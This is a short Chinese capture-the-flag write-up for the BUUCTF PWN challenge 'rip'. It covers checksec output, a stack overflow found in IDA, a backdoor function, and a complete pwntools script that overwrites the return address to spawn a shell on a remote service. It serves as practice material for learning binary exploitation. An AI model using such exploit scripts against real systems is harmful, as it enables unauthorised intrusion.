【BUUCTF - PWN】rip

checksec一下,发现啥保护也没开
【BUUCTF - PWN】rip_第1张图片
IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf
【BUUCTF - PWN】rip_第2张图片
发现后门函数
【BUUCTF - PWN】rip_第3张图片
脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('xxx',xxx)

payload='a'*(0xf+8)+p64(0x401187)
sl(payload)

io.interactive()

附件:rip

你可能感兴趣的:(BUUCTF,-,PWN)